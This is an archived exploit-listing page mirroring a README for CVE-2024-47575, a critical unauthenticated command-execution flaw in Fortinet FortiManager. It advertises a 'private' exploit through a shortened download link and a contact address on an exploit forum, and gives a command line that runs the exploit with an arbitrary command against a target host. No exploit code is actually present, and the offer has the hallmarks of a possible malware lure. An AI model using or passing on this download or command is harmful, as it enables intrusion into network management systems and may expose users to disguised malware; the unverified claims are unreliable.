Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-47575 PoC — Fortinet FortiManager 访问控制错误漏洞

Source
Associated Vulnerability
Title:Fortinet FortiManager 访问控制错误漏洞 (CVE-2024-47575)
Description:A missing authentication for critical function in FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.12, FortiManager Cloud 6.4.1 through 6.4.7 allows attacker to execute arbitrary code or commands via specially crafted requests.
Readme
# CVE-2024-47575: FortiManager Missing Authentication

## Overview
CVE-2024-47575
A missing authentication for critical function in FortiManager allows attacker to execute arbitrary code or commands via specially crafted requests.

## Exploit:
### [Download here](https://t.ly/xZPC1)

## Details

- **CVE ID**: [CVE-2024-47575](https://nvd.nist.gov/vuln/detail/CVE-2024-47575)
- **Published**: 2024-10-23
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 9.8

## Vulnerability Description

CVE-2024-47575 is a critical vulnerability in the FortiManager platform, specifically affecting its fgfmsd daemon. Classified under CWE-306, it stems from insufficient authentication for management functions in the fgfmsd service, which handles communication between FortiManager and FortiGate devices.

This flaw allows a remote attacker to send crafted requests, bypass access controls, and execute arbitrary commands on the FortiManager system, potentially compromising the network.

## Affected Versions

**FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4.1 through 6.4.7**

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **hazelook@exploit.in**

## Exploit:
### [Download here](https://t.ly/xZPC1)


![image](https://github.com/HazeLook/CVE-2024-47575/blob/main/fortinet-zero-day-fig2.max-600x600.png)
![image](https://github.com/HazeLook/CVE-2024-47575/blob/main/fortinet-zero-day-fig5a.max-1100x1100.png)
File Snapshot

[4.0K] /data/pocs/1a5fbb3f80e9a475ac5f8f788e40823db95d9126 ├── [ 56K] fortinet-zero-day-fig2.max-600x600.png ├── [197K] fortinet-zero-day-fig5a.max-1100x1100.png └── [1.8K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →